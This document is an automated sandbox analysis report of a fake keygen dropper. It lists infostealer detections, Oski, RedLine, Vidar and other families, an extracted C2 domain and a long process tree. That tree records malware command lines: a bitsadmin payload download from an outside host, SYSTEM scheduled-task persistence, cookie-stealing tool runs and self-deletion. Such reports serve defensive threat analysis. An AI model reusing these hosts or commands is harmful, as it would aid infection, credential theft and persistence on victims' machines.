Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    202s
  • max time network
    660s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    05-05-2021 12:58

General

Malware Config

Extracted

Family

oski

C2

weirdtrendz.com

Signatures

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 49 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 54 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 57 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 35 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 55 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:68
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:492
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
      1⤵
        PID:1348
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s SENS
        1⤵
          PID:1404
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1952
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
            1⤵
              PID:2812
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2796
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
                PID:2704
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2532
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                  1⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2512
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1188
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1064
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:4808
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:3296
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3060
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3188
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:4612
                        • C:\Users\Admin\AppData\Local\Temp\is-K2TDJ.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-K2TDJ.tmp\Install.tmp" /SL5="$B01DE,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:4644
                          • C:\Users\Admin\AppData\Local\Temp\is-V21OC.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-V21OC.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4756
                            • C:\Program Files\Windows Defender\KYXGXFSJCE\ultramediaburner.exe
                              "C:\Program Files\Windows Defender\KYXGXFSJCE\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4656
                              • C:\Users\Admin\AppData\Local\Temp\is-F4EL9.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-F4EL9.tmp\ultramediaburner.tmp" /SL5="$401EC,281924,62464,C:\Program Files\Windows Defender\KYXGXFSJCE\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:4732
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3596
                            • C:\Users\Admin\AppData\Local\Temp\44-67161-135-cc88c-0bb8fde52d3c0\Lidarisizhae.exe
                              "C:\Users\Admin\AppData\Local\Temp\44-67161-135-cc88c-0bb8fde52d3c0\Lidarisizhae.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2316
                            • C:\Users\Admin\AppData\Local\Temp\ce-c5014-5f2-69184-b02afe291bcd2\Qashysyshibo.exe
                              "C:\Users\Admin\AppData\Local\Temp\ce-c5014-5f2-69184-b02afe291bcd2\Qashysyshibo.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2880
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\foxq5lkd.uuj\KiffMainE1.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2072
                                • C:\Users\Admin\AppData\Local\Temp\foxq5lkd.uuj\KiffMainE1.exe
                                  C:\Users\Admin\AppData\Local\Temp\foxq5lkd.uuj\KiffMainE1.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4920
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2i0r230s.kpq\001.exe & exit
                                6⤵
                                  PID:4180
                                  • C:\Users\Admin\AppData\Local\Temp\2i0r230s.kpq\001.exe
                                    C:\Users\Admin\AppData\Local\Temp\2i0r230s.kpq\001.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:3912
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u0y2d3sk.n2j\download.exe & exit
                                  6⤵
                                    PID:1940
                                    • C:\Users\Admin\AppData\Local\Temp\u0y2d3sk.n2j\download.exe
                                      C:\Users\Admin\AppData\Local\Temp\u0y2d3sk.n2j\download.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:4196
                                      • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                        C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                        8⤵
                                          PID:1032
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 1032 & erase C:\Users\Admin\AppData\Local\Temp\svchost.exe & RD /S /Q C:\\ProgramData\\558387732329640\\* & exit
                                            9⤵
                                              PID:5760
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /pid 1032
                                                10⤵
                                                • Kills process with taskkill
                                                PID:1148
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w5ag0c5h.tj2\installer.exe /qn CAMPAIGN="654" & exit
                                        6⤵
                                          PID:4860
                                          • C:\Users\Admin\AppData\Local\Temp\w5ag0c5h.tj2\installer.exe
                                            C:\Users\Admin\AppData\Local\Temp\w5ag0c5h.tj2\installer.exe /qn CAMPAIGN="654"
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Enumerates connected drives
                                            • Modifies system certificate store
                                            • Suspicious use of FindShellTrayWindow
                                            PID:852
                                            • C:\Windows\SysWOW64\msiexec.exe
                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\w5ag0c5h.tj2\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\w5ag0c5h.tj2\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619983791 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                              8⤵
                                                PID:736
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xsmghhgd.eg5\gpooe.exe & exit
                                            6⤵
                                              PID:908
                                              • C:\Users\Admin\AppData\Local\Temp\xsmghhgd.eg5\gpooe.exe
                                                C:\Users\Admin\AppData\Local\Temp\xsmghhgd.eg5\gpooe.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                PID:1980
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:5124
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:5808
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pbtpmz2i.f05\google-game.exe & exit
                                              6⤵
                                                PID:5540
                                                • C:\Users\Admin\AppData\Local\Temp\pbtpmz2i.f05\google-game.exe
                                                  C:\Users\Admin\AppData\Local\Temp\pbtpmz2i.f05\google-game.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:5636
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                    8⤵
                                                    • Loads dropped DLL
                                                    PID:5800
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\laovny5a.uqh\huesaa.exe & exit
                                                6⤵
                                                  PID:6136
                                                  • C:\Users\Admin\AppData\Local\Temp\laovny5a.uqh\huesaa.exe
                                                    C:\Users\Admin\AppData\Local\Temp\laovny5a.uqh\huesaa.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5316
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      8⤵
                                                        PID:5660
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:4332
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hads5u0j.yj3\setup.exe & exit
                                                    6⤵
                                                      PID:5284
                                                      • C:\Users\Admin\AppData\Local\Temp\hads5u0j.yj3\setup.exe
                                                        C:\Users\Admin\AppData\Local\Temp\hads5u0j.yj3\setup.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:4944
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\hads5u0j.yj3\setup.exe"
                                                          8⤵
                                                            PID:5368
                                                            • C:\Windows\SysWOW64\PING.EXE
                                                              ping 1.1.1.1 -n 1 -w 3000
                                                              9⤵
                                                              • Runs ping.exe
                                                              PID:5604
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ts12eizd.1z0\askinstall39.exe & exit
                                                        6⤵
                                                          PID:5936
                                                          • C:\Users\Admin\AppData\Local\Temp\ts12eizd.1z0\askinstall39.exe
                                                            C:\Users\Admin\AppData\Local\Temp\ts12eizd.1z0\askinstall39.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:4760
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                              8⤵
                                                                PID:2760
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im chrome.exe
                                                                  9⤵
                                                                  • Kills process with taskkill
                                                                  PID:5392
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a5zvya4f.ccm\Setup_v3.exe & exit
                                                            6⤵
                                                              PID:5864
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:5660
                                                              • C:\Users\Admin\AppData\Local\Temp\a5zvya4f.ccm\Setup_v3.exe
                                                                C:\Users\Admin\AppData\Local\Temp\a5zvya4f.ccm\Setup_v3.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:5848
                                                                • C:\Windows\SysWOW64\at.exe
                                                                  "C:\Windows\System32\at.exe"
                                                                  8⤵
                                                                    PID:5368
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                                    8⤵
                                                                      PID:5840
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\System32\cmd.exe
                                                                        9⤵
                                                                          PID:5452
                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                            findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                                            10⤵
                                                                            • Executes dropped EXE
                                                                            PID:6812
                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                            Fessura.exe.com Z
                                                                            10⤵
                                                                            • Executes dropped EXE
                                                                            PID:7052
                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                                              11⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:6168
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                                12⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:6316
                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                12⤵
                                                                                • Executes dropped EXE
                                                                                PID:1276
                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                            ping 127.0.0.1 -n 30
                                                                            10⤵
                                                                            • Runs ping.exe
                                                                            PID:7020
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                        8⤵
                                                                          PID:6952
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o4khm2z1.unz\y1.exe & exit
                                                                      6⤵
                                                                        PID:5396
                                                                        • C:\Users\Admin\AppData\Local\Temp\o4khm2z1.unz\y1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\o4khm2z1.unz\y1.exe
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:5224
                                                                          • C:\Users\Admin\AppData\Local\Temp\a6itgF1o9o.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\a6itgF1o9o.exe"
                                                                            8⤵
                                                                            • Executes dropped EXE
                                                                            • Modifies system certificate store
                                                                            PID:6476
                                                                            • C:\Users\Admin\AppData\Roaming\1620243163656.exe
                                                                              "C:\Users\Admin\AppData\Roaming\1620243163656.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620243163656.txt"
                                                                              9⤵
                                                                                PID:6812
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\a6itgF1o9o.exe"
                                                                                9⤵
                                                                                  PID:6424
                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                    ping 127.0.0.1 -n 3
                                                                                    10⤵
                                                                                    • Runs ping.exe
                                                                                    PID:6536
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\o4khm2z1.unz\y1.exe"
                                                                                8⤵
                                                                                  PID:6640
                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                    timeout /T 10 /NOBREAK
                                                                                    9⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:6708
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fejstqll.n4h\toolspab1.exe & exit
                                                                              6⤵
                                                                                PID:5640
                                                                                • C:\Users\Admin\AppData\Local\Temp\fejstqll.n4h\toolspab1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\fejstqll.n4h\toolspab1.exe
                                                                                  7⤵
                                                                                    PID:5164
                                                                                    • C:\Users\Admin\AppData\Local\Temp\fejstqll.n4h\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\fejstqll.n4h\toolspab1.exe
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:5852
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5bkrzle0.b03\005.exe & exit
                                                                                  6⤵
                                                                                    PID:5284
                                                                                    • C:\Users\Admin\AppData\Local\Temp\5bkrzle0.b03\005.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\5bkrzle0.b03\005.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4820
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c5fozhsh.wxg\SunLabsPlayer.exe /S & exit
                                                                                    6⤵
                                                                                    • Blocklisted process makes network request
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks processor information in registry
                                                                                    PID:1032
                                                                                    • C:\Users\Admin\AppData\Local\Temp\c5fozhsh.wxg\SunLabsPlayer.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\c5fozhsh.wxg\SunLabsPlayer.exe /S
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Drops file in Program Files directory
                                                                                      PID:5872
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw3ACA.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:6072
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw3ACA.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:6300
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw3ACA.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:6520
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw3ACA.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:6852
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw3ACA.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:7092
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw3ACA.tmp\tempfile.ps1"
                                                                                                  8⤵
                                                                                                    PID:6156
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw3ACA.tmp\tempfile.ps1"
                                                                                                    8⤵
                                                                                                    • Checks for any installed AV software in registry
                                                                                                    PID:6072
                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                    8⤵
                                                                                                    • Download via BitsAdmin
                                                                                                    PID:5460
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      9⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3340
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies system certificate store
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4272
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                          3⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1128
                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                            ping 127.0.0.1
                                                                                            4⤵
                                                                                            • Runs ping.exe
                                                                                            PID:3600
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks whether UAC is enabled
                                                                                        PID:5432
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4980
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                            PID:3340
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                              PID:3340
                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                          1⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4852
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                            2⤵
                                                                                            • Checks processor information in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:1032
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                            2⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Checks processor information in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:4500
